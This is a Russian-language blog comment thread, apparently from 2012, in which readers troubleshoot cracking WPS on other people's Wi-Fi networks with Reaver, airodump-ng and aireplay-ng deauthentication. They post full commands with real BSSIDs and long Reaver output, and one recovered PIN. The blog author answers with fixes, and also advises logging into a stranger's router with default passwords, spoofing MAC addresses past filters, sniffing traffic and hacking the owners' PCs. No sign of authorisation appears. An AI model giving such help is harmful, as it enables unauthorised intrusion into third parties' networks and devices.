      Большое спасибо!

      Да, есть такие мысли. Будут статьи по: шелам (Shell С99), взлом сайтов по web-уязвимостям, взлом сайтов по ОС-уязвимостям и т.п. В общем еще будет много интересных статей.

      Также разрабатывается учебный материал по Linux – LPIC1 (online-курсы).

  • алексей says:

    а можно сделать отдельную статью про WPA с отключенным WPS ?или подскажите,где можно что то конкретное по этой теме почитать?

    • Hub-lex says:

      Такая статья скоро выйдет! Главное дождитесь. Мне физически не успеть: работа, блог, самообразование, freetime.

  • алексей says:

    будем ждать!за предоставленный материал спасибо!

  • Спасибо огромное за материал, но со всеми сетями у меня ошибка WARNING: Failed to associate with. Ловит почти все хорошо, скан показывает, что wps выключен. Что надо делать?

    • Hub-lex says:

      Давайте с вами договоримся сразу! Предоставляйте и команды и их вывод. Говорите подробно, что вы делать и что у вас получилось.
      Что касается этого сообщения – какой у вас уровень сигнала?

  • Khch says:

    я установил R2.

    у меня такая ситуация

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
    [+] Waiting for beacom from 02:02:CF …
    [+] Switching mon0 to channel 1
    [!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)

    [!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)

    [!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)

    [!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)

    [!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)

    и так вот уже час … Все у меня нормально ?

    • Hub-lex says:

      Давайте с вами договоримся сразу! Предоставляйте и команды и их вывод. Говорите подробно, что вы делать и что у вас получилось.
      Что касается этого сообщения – какой у вас уровень сигнала?

  • Khch says:

    попытка #2.

    [+] Waiting for beacon from 34:08: …
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Associated with 34:08:…. (ESSID: KMARAZZI)

    И все, больше не чего не происходит вот уже 2,5 часа. Имеет смысл ждать?

    P.S. как узнать уровень сигнала ? Это “PWR” или “CH” ?

    • Hub-lex says:

      “PWR” – power (мощность)
      “CH” – channel (канал)


      [+] Switching mon0 to channel 3
      [+] Switching mon0 to channel 4
      [+] Switching mon0 to channel 5
      ….
      значит идет переключение каналов -> нужно поставить № канала на котором работает АР.
      покажите команды, какую вводили и их вывод

      p.s.: вам похоже все равно о том что я писал, когда отвечал на предыдущее ваше сообщение. в след. раз будете пользоваться поиском.

  • Khch says:

    “p.s.: вам похоже все равно о том что я писал, когда отвечал на предыдущее ваше сообщение. в след. раз будете пользоваться поиском.” – Что вы имеете введу? Я написал все что было.

    • алексей says:

      скопируй человеку все команды которые вводил и что происходило после этих команд тоже.и тогда тебе помогут и объяснят твои проблемы

    • Hub-lex says:

      Вы мне пишите вывод команд(ы). Но мне нужно не только это. Все команды, которые вы вводили и их вывод.
      Про поиск я имею ввиду, что если ввести “Switching mon0 to channel” в поиск – вы узнаете в чем проблема.

  • Khch says:

    1000 SORRY. У меня такой вопрос. Допустим мне стал известен ключ от wifi типа (AE:5B:7F:3A:03:D0:AF:9B:FD:C7:E2). Зачем оно мне? Это же не пароль. Как я могу этим воспользоваться ???
    Again 1000 Sorry.

  • Александр says:

    Спасибо вам за статью.Всё очень подробно.Получилось с первого раза. :smile: Десять часов и четыре минуты.

  • Loman says:

    Заметил, что некоторые роутеры не любят, когда делают паузы при подборе пина ривером.
    Начинаю подбор, скорость перебора хорошая – 3 секунды на пин. Через некоторое время останавливаю ривер (ctrl+C). Запускаю опять, восстанавливаю прежнюю сессию, и посыпались эти sending eapol start request, receive timeout occured. И так до тех пор, пока сам хозяин не перезагрузит роутер, или в доме не погаснет свет.
    Интересно, может на это влиять настройка роутера Station Keep Alive (интервал в секундах между проверками активности беспроводных устройств, входящих в локальную сеть. Если задано значение 0, проверка не выполняется). А по умолчанию стоит именно 0.

  • Алексей says:

    Здравствуйте. У меня проблема по поиску ключа, все сделал как по инструкции, но когда дошел до:
    reaver -i mon0 -b ХХ:ХХ:ХХ:ХХ:ХХ:ХХ -vv
    Ответ всегда один:
    reaver: command not found т.е. команда не найдена :neutral:
    Подскажите что делать :?:

    • Hub-lex says:

      Здравствуйте. Какой дистрибутив используйте?
      Если выводится сообщение, как у вас (reaver: command not found) значит reaver не установлен.
      Советую вам скачать BackTrack 5 R2 с предустановленным reaver – http://www.backtrack-linux.org/downloads/

  • Psh says:

    Добрый день! Просканил вифи точку реавиром выдала мне она пин и пароль. НО Этот пароль не входит( Что делать? ( на первый раз его ввожу она не подключается/ говорит время подкл истекло, дальше на 2 раз подключается, но сначала пишет нет интернет подключения а потом эта надпись пропадает и показывает мне что я в сети, но раздачи инета нету(((( шо делать? ( входил на Мак ос) ( вводил пароль на убунту та ваще не подключилась)

    • Hub-lex says:

      Может быть стоит фильтрация по МАС? У АР есть другие клиенты, которые к ней подключены?

      • psh says:

        Mac у меня поставлен такой же как и у клиента который был подключен к сети.. сейчас я вижу в сети только принтер по ip сканеру ( походу там прокси)

        • Hub-lex says:

          Правильно ли я понял – у вас есть доступ к wifi сети. Т.е. вы к ней подключены, да?

  • psh says:

    да доступ есть.Запустил прогу айписканер для макинтоша.. Нашел только принтер и все(( Т.е у них либо прокси либо еще че то интересное . либо у них вообще нету интернета

    • Hub-lex says:

      Хорошо. На вашем месте я бы просканировал всю сеть + зашел бы на АР и посмотрел, какие имеются настройки. Так же имеет место добавить свой МАС-адрес в список доверенных, если там конечно же стоит МАС-фильтр.
      Также можно собрать их трафик, взломать ПК и посмотреть что там =)
      Вариантов куча.

  • psh says:

    Нашел айпи роутера зашел а там пароль не походит админ админ)))))))))) че делать)))

  • psh says:

    wifi d-link dir-615 Hardware version: E4 firmware version 5.10

    • Hub-lex says:

      Попробуйте воспользоваться программами, которые предоставил. И routerpwn тоже.

  • Андрей says:

    Здравствуйте Нub lex Установил BT 5R2 ситуация та же не проходит команда на запуск реавер (сравнил файлы в папке BT 5R1 т е реавер у меня был установлен но не запускался ) тут что -то другое Я УЖЕ попрбовал и на ВМ и с флешки и установил BT 5 второй ОС не запускается реавер

    • Hub-lex says:

      Здравствуйте Андрей. Это очень странно, так как reaver установлен в BT5R2. Покажите как вы вводите команды и их вывод.

      p.s.: skype = hub-lex-21

  • Андрей says:

    Здравствуйте Hub lex Вводиться команда reaver-i mon-bxxxxxxxxxxxxxx-c6-vv reaver-i:command not found ВТ-5R2 я установил KDE но в прошлый раз был ГНОМ И ТОЖЕ САМОЕ По skype не могу общаться скорости нет выхожу через модем МТС

    • Hub-lex says:

      Если вы вводите именно так так показали, тогда вам нужно поставить пробелы. Введите только команду reaver и нажмите Enter, что произойдет?

  • Вадим says:

    Такой у меня вопрос:
    1) На сколько я понял, при взломе через WPS подключенные сторонние клиенты на требуются (как при взломе WEP)
    2) Если на АР WPS отсутствует, reaver должен выдать ошибку?

  • Вадим says:

    И еще несколько вопросов.
    3. Не сталкивались с ситуацией, ошибка.
    WARNINGP Failed to associate’1 with хх:хх:хх:хх:хх:хх (ESSID: ххххххх)
    Я так понял это фильтр по MAC, отследил несколько адресов клиентов, попробовал залезть под подменными MAC, ошибка повторяется.
    4. Ошибка WPS transaction failed (code: 0xQ3), re-trying last pin
    Я так пологою означает что роутер не поддерживает WPS? На нем есть кнопка Qss, что-то тоже связанное с автонастройкой безопасности, но я так полагаю это уже что-то другое. Роутер TP-Link-овский.
    5. Может ли фильтрация по MAC помешать программе WASH проверить сеть на наличие WPS?

  • Вадим says:

    6. хх- хх-хх-хх-хх-хх-00-00-00-00-00-00-00-00-00-00
    Эта куча нолей в конце адреса mon0 это нормально?
    Я могу поменять адрес wlan0, но mon0 все равно будет реальный + куча нолей.

  • Константин says:

    а как бороться с этой ошибкой WPS transaction failed (code: 0xQ3)??еще пин код состоит из только из 8 цифр?

  • Андрей says:

    Здравствуйте Hub-lex Да с пробелами реавер запустился и R1 и R2 но далеко не ушел т к на этой точке фильтрация МАС адресов

  • HalPls says:

    Подскажите пожалуйста по такому вопросу:
    Нахожу в радиусе действия открытую сеть. Подключаюсь к ней. Все проходит. Интернет есть. Сеть OPN пишет при команде airodump-ng mon0
    Интернет работает, но через пару дней при подключении говорит что подключение ограничено, без доступа к сети интернет. После первого такого раза нашел вторую сеть, и подключился к ней. Через пару дней опять тоже самое. Сети все равно OPN показывает.
    Может это быть что-то с адаптером? Или что такое еще может быть? (ОС: Windows 7 Ultimate)

    • kripto75 says:

      Уважаемый Hub-lex!!! Такая-же беда как и у HalPls… по началу думал что это только у меня!!! Ан нет!!! проблему не удается решить ( колдовал с настройками) может какая-то хитрость существует??? Спасибо.

      • Hub-lex says:

        Из какой ОС заходите?
        Т.е. подключаетесь (есть Сети и т.п.), но потом все пропадает?
        Когда подключились к wifi сети, заходили ли на АР (роутер), чтобы посмотреть какие настройки стоят?

        p.s.: опишите более детально ваши действия

        • kripto75 says:

          Роутер то чужой :-)) , как мне на него зайти…

          • Hub-lex says:

            Ломануть, как еще)
            + проверить его на пароли по дефолту, например:
            login: admin
            pass: < пусто>
            OR
            login: admin
            pass: admin и т.п.

          • User says:

            Ответ очевиден. Иметь под боком дефолтные пассы разных роутеров. Ты знаешь, что это скажем TP-Link – ну и значит долбишь TP-Link. Плюс к тому пробить какой пров – какие роутеры использует. У прова порой есть дефолтные комбинации: user + pass. А то Ты можешь вбивать “1234″, “admin”, “root” – а там элементарный beeline. Конечно покапаться надо будет, поискать – а кто говорил что будет просто. Просто даже кошки не еб…

      • kripto75 says:

        Да и ещё :в BackTrack всё работает (т.е. соединение с инетом есть) , а когда захожу под Vista есть только соединение с локалкой, с инетом соединения нет….HELP!!!

        • Hub-lex says:

          Ну если по локальной сети есть соединение, тогда лучше будет зайти на АР (роутер) и посмотреть, что там за настройки. Мне кажется так будет проще сделать, чем годать.

          • kripto75 says:

            Спасибо за совет! К сожалению не очень знаю как попасть,зайти в настройки роутера…. как говориться : пойду курить мануалы :-)))

  • Meloman says:

    Здравствуйте Hub-lex!
    Успешно прошел взлом первой жертвы DLink за 12 часов командой reaver -i mon0 -b 1C:7E:E5:38:68:A2 -c 1 -vv –nack
    А вот вторая жертва TPlink пробирает pin до 100%, а пароля нет!


    [+] Trying pin 23259454
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 23259461
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 23259478
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] 100.00% complete @ 2012-05-10 23:57:53 (5 seconds/pin)
    [+] Pin cracked in 5233 seconds
    [+] WPS PIN: ’23259478′

    Что делать? Как узнать пароль?

  • Meloman says:

    Вот такой командой
    reaver -i mon0 -b F8:D1:11:6E:A2:08 -c 4 -vv –no-nack –eap-terminate

  • Loman says:

    Какую флешку порекомендуете для загрузки с нее бак-трака? Любую больше 2 гб?
    Пробовал с карты памяти 2гб microSD через usb-адаптер и не пошло. Как диск в биосе ее видно, но при загрузке белый курсор в левом верхнем углу монитора на черном фоне…
    А то куплю не ту флешку, и увижу белый курсор…

    • алексей says:

      4 гб флэшка отлично работает.главное образ записать правильно

  • Nivi says:

    Столкнулся с интересным глюком
    Установил iso BackTrack гном на флешку
    Гружусь с этой флешки, запускаю иксы все нормально
    Доустанавливаюс с свн reaver, запускаю мониторинг сети, вижу интересующую меня мою сетку
    Начинаю подбор пароля и тишина подбор стопится(постоянно эти сообщения) на этом
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    указываю через параметр -р какой у меня пин и ничего не меняется. он пробует этот пин и ничего не возвращает, тока ошибки

    перезагружаю ноут
    иксы на этот раз не стартую
    запускаю ВСЕ ТЕ ЖЕ команды что и под иксами, с указанием пина тут же выдает пароль

    в чем глюк?
    есть подозрение что он под иксами не видит(или не может использовать) вайфайную карту, но ведь в таком случае он бы и сеть не мониторил и ничего не выдавал? или я не прав?

  • boom says:

    Ребят помогите загружаю с диска как на видео где сразу boot если не писать то перезагружается,а если писать root или startx то секунд через 5 загружается нажимаю boot text mode загружается сразу без startx и через несколько секунд что-то с видео чёрные полосы посередине и искажение внизу.Пользуюсь BackTrack 5 R2.

  • San4ello says:

    Pomogite! Pogaluista!

    vvogu -

    iwconfig
    airmon-ng start wlan0
    airodump-ng mon0
    reaver -i mon0 -b xxxxxxxxx -vv

    otvet

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:25:53:09:7B:18
    [+] Switching mon0 to channel 11
    [+] Associated with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
    [+] Trying pin 12345670
    [!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response

    i ni4ego ne proishodit

    WPS – est ploveril wash-om
    50# – signal sredniu

    proboval vot tak ewe

    reaver -i mon0 -b xxxxxxxxx -c 11 -vv

    RReaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 00:25:53:09:7B:18
    [!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
    [+] Associated with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
    [+] Trying pin 12345670
    [!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 12345670
    [!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    i tak do beskone4nosti

    pomogite razobratsya.

    • Hub-lex says:

      Проблема может быть в уровне сигнала. Попробуйте на другой АР, у которой уровень сигнала лучше.

      • алексей says:

        на мою проблему,немного выше что то скажете?

        • Hub-lex says:

          А еще раз, что за проблема?

          • алексей says:

            алексей 16 Май 2012 в 20:46

            как то что то опять не получилось root@bt:~# iwconfig
            lo no wireless extensions.

            wlan0 IEEE 802.11bg ESSID:off/any
            Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
            Retry long limit:7 RTS thr:off Fragment thr:off
            Encryption key:off
            Power Management:off

            eth0 no wireless extensions.

            root@bt:~# airmon-ng start wlan0

            Found 2 processes that could cause trouble.
            If airodump-ng, aireplay-ng or airtun-ng stops working after
            a short period of time, you may want to kill (some of) them!

            PID Name
            2354 dhclient3
            2412 dhclient3
            Process with PID 2412 (dhclient3) is running on interface wlan0

            Interface Chipset Driver

            wlan0 Atheros AR2425 ath5k – [phy0]
            (monitor mode enabled on mon0)

            root@bt:~# airodump-ng mon0

            CH 3 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -73 19 0 0 4 54 WPA2 CCMP PSK KMB g
            F8:D1:11:43:CC:A0 -93 7 0 0 8 54e. WPA2 CCMP PSK TP-LIg
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <leng

            BSSID STATION PWR Rate Lost Frames Probe

            CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -73 20 0 0 4 54 WPA2 CCMP PSK KMB
            F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length

            BSSID STATION PWR Rate Lost Frames Probe

            CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -71 21 0 0 4 54 WPA2 CCMP PSK KMB
            F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_4
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:

            BSSID STATION PWR Rate Lost Frames Probe

            CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
            00:02:CF:CF:41:01 -70 22 0 0 4 54 WPA2 CCMP PSK KMB
            F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_43
            00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:

            BSSID STATION PWR Rate Lost Frames Probe

            CH 12 ][ Elapsed: 4 mins ][ 2012-05-16 16:14

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            00:02:CF:CF:41:01 -65 703 9 0 4 54 WPA2 CCMP PSK KMB
            C8:60:00:93:55:B4 -71 374 39 0 1 54e WPA2 CCMP PSK Oleg
            F8:D1:11:43:CC:A0 -82 249 23 0 8 54e. WPA2 CCMP PSK TP-LINK_43CCA
            00:13:1A:57:65:A0 -101 29 18 0 1 11e. OPN
            1C:7E:E5:FF:90:72 -101 62 0 0 11 54e WEP WEP DIR-300NRU
            D8:5D:4C:D2:E3:C8 -100 21 0 0 11 54 . WPA2 CCMP PSK Internet

            BSSID STATION PWR Rate Lost Frames Probe

            (not associated) 30:38:55:C4:31:3A -93 0 - 1 0 5 00:02:CF:CF:41:01 00:19:D2:23:5E:D3 -84 54 - 1 0 82 KMB F8:D1:11:43:CC:A0 00:1C:BF:3B:7E:70 -97 54e- 1e 0 20
            root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 mon0
            16:15:41 Waiting for beacon frame (BSSID: 00:02:CF:CF:41:01) on channel 12
            16:15:51 No such BSSID available.
            Please specify an ESSID (-e).
            root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 -e mon0
            No replay interface specified.
            "aireplay-ng --help" for help.
            root@bt:~#

      • San4ello says:

        Ya proboval na drugoi – vse polu4ilos i signal takoi ge primerno. Kuplu na dnyah antenu dlya wifi – poprobuu ewe raz. sps za otvet.

  • boom says:

    Всё посмотрел видео BackTrack 5 R2 как устанавливать всё вроде работает,только после нажатия boot text mode загрузка и опять тоже самое посредине чёрные полосы,а внизу рябь но и картинку видно с загрузкой BackTrack.Скачал 32,а система стоит на ноуте 64 7 максимальная.Hub-lex помоги!

  • boom says:

    hub-lex спасибо на компе пошла нормально 32 7-ке
    хотелось бы и на ноут попробую на 64 скачать!

  • pit55555 says:

    А на Windows 7 эта програма работаэт

  • pit55555 says:

    Так значит не важно какая операцыонная система, просто с диска запускать BackTrack и все делать по инструкцыи

    • Hub-lex says:

      Да. Советую найти в Сети информацию о том, что такое Live-CD/USB. Потому что, как я вижу у вас с этим проблемы. Прочитайте и как мин-ум вопрос, который вы задали отпадет сам по себе.

      p.s.: лучше использовать Live-USB, так как у USB скорость считывания гораздо выше чем у CD. А отсюда след. что работа будет выполнена быстрее.

  • boom says:

    Hub-lex на ноуте всё равно так и есть,а накомпе работает ну да ладно!Щас о другом подскажи как правильно установить программу и какую? чтоб сменить мак адрес, накомпе хотел через выделенку подсоединить начал прописывать ip ну и прописал какую то систему их.Так огорчённый провайдер или админ через 20 минут прибежал,а там через ппое,как подсоединить BackTrack 5 R2 подскажи пожалуйста!

    • Hub-lex says:

      МАС-адрес меняет программа macchanger. Установить так: # apt-get install macchanger

      Другую часть вопроса не понял. По возможности писать лучше разборчиво и по шагам:
      1. что хочу сделать
      2. что сделал!
      3. что получилось
      4. как мне разобраться

  • boom says:

    как подключиться через выделенку не прописывая ип маску шлюз, только логин и пароль!

  • Дмитрий says:

    Здравствуйте скачал я этот BackTrack 5 R2 и не могу понять Как сделать загрузочный usb а не диск?в архиве который скачал нет образа чтобы даже На диск записать.На флешку все таки Лучше было бы:)

  • Сергей says:

    Добрый вечер,Hub-lex! Подскажите,пожалуйста,как установить macchanger в BackTrack 5 и как пользоваться? Спасибо.

  • Дмитрий says:

    Я совсем запутался Да еще и с этим macchanger я с телефона еще пишу много выйдет писать вам про ошибки и т.д если у вас есть время разрешите вам позвонить На скайп Заранее спасибо

  • Артур says:

    Добрый день! Я всё делаю как перечислено выше, но после того как я ввожу команду: reaver -i mon0 -b xxxxxxxxxxxxxx -vv он пишет: reaver: command not found. Помогите пожалуйста не знаю что делать.

  • Артур says:

    BackTrack 5 R2

    • Hub-lex says:

      Быть такого не может, чтобы в нем не было reaver. Точно ли BT5R2? Может все таки BT5R1?

  • Артур says:

    ссылка на этом сайте, в самом начале.

  • Артур says:

    Я извиняюсь и правда BackTrack 5 R1

  • Артур says:

    Всё получилось, только при попытке уже самого взлома пишет:
    reaver v1.4 wifi protected setup attack tool
    waiting for beacon from 20:7C:…
    switching mon0 to chanel 1 и т.д.
    Продолжается это постоянно и больше ничего не происходит.

    • Hub-lex says:

      ммм…мне это ни о чем не говорит. предоставьте команды, которые вводите и их вывод

  • Paulstein says:

    Reaver v1.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [-] Failed to initialize interface ‘mon0′
    [-] Failed to recover WPA key
    [+] Nothing done, nothing to save.
    Как с этим бороться :?:

    • Hub-lex says:

      пока что вижу, что что то не так с интерфейсом “Failed to initialize interface ‘mon0?”. старайтесь переводить фразы и ошибки.
      к тому же, то что представили вы – этого не достаточно! покажите команды, которые вводите и их вывод

  • Сергей says:

    Добрый вечер,Hub-lex. Подскажите,пожалуйста,как менять Mac,какие комады вводить? Как фильтрацию обойти? Cпасибо.

    • Hub-lex says:

      посмотрите внимательнее коментарии к статьям. имейте ввиду что есть целый раздел о Wi-Fi, т.е. тема не ограничивается только одной статьей.
      ваш вопрос был много раз оговорен.

  • pit55555 says:

    как запустить BackTrack 5 R2?

  • Pauistein says:

    Доброго времени суток!

    Reaver v1.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [-] Failed to initialize interface ‘mon0?
    [-] Failed to recover WPA key
    [+] Nothing done, nothing to save.
    выдало после ввода reaver -i mon0 -b bssid -vv . bssid были разные, но результат тотже.(ubuntu10.) Сечас поставил BackTrack 5 и выдаёт
    [+] Waiting for beacon from CC:96:A0:45:F0:AA
    [+] Switching mon0 to channel 6
    [!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID:javascript:grin(‘:!:’)

    • Hub-lex says:

      Доброго, старайтесь смотреть комментарии и рекомендации в них. Одна из рекомендаций – покажите команды, которые вводите и их вывод

      • Pauistein says:

        root@bt:~# iwconfig
        lo no wireless extensions.

        eth0 no wireless extensions.

        wlan0 IEEE 802.11bgn ESSID:off/any
        Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
        Retry long limit:7 RTS thr:off Fragment thr:off
        Encryption key:off
        Power Management:on

        root@bt:~# airmon-ng start wlan0

        Found 2 processes that could cause trouble.
        If airodump-ng, aireplay-ng or airtun-ng stops working after
        a short period of time, you may want to kill (some of) them!

        PID Name
        1285 dhclient3
        1337 dhclient3
        Process with PID 1285 (dhclient3) is running on interface wlan0

        Interface Chipset Driver

        wlan0 Atheros AR9285 ath9k – [phy0]
        (monitor mode enabled on mon0)

        root@bt:~# airodump-ng mon0

        CH 5 ][ Elapsed: 8 s ][ 2012-05-22 11:35

        BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

        CC:96:A0:45:F0:AA -33 10 0 0 6 54e WPA2 CCMP PSK MTC

        BSSID STATION PWR Rate Lost Packets Probes

        root@bt:~# reaver -i mon0 -b CC:96:A0:45:F0:AA -vv

        Reaver v1.4 WiFi Protected Setup Attack Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        [+] Waiting for beacon from CC:96:A0:45:F0:AA
        [+] Switching mon0 to channel 6
        [!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID: MTC)
        [!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID: MTC)
        [!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID: MTC)

        • Hub-lex says:

          поробуйте так – # reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -e network_name -vv -A

          • Pauistein says:

            Спасибо за ответ!
            [+] Switching mon0 to channel 6
            [+] Waiting for beacon from CC:96:A0:45:F0:AA
            [+] Associated with CC:96:A0:45:F0:AA (ESSID: network_name)
            теперь можно жать ?

          • Hub-lex says:

            да, теперь остается только ждать.

  • алексей says:

    алексей 20 Май 2012 в 17:51

    алексей 16 Май 2012 в 20:46

    как то что то опять не получилось root@bt:~# iwconfig
    lo no wireless extensions.

    wlan0 IEEE 802.11bg ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off

    eth0 no wireless extensions.

    root@bt:~# airmon-ng start wlan0

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    2354 dhclient3
    2412 dhclient3
    Process with PID 2412 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan0 Atheros AR2425 ath5k – [phy0]
    (monitor mode enabled on mon0)

    root@bt:~# airodump-ng mon0

    CH 3 ][ Elapsed: 8 s ][ 2012-05-16 16:10

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

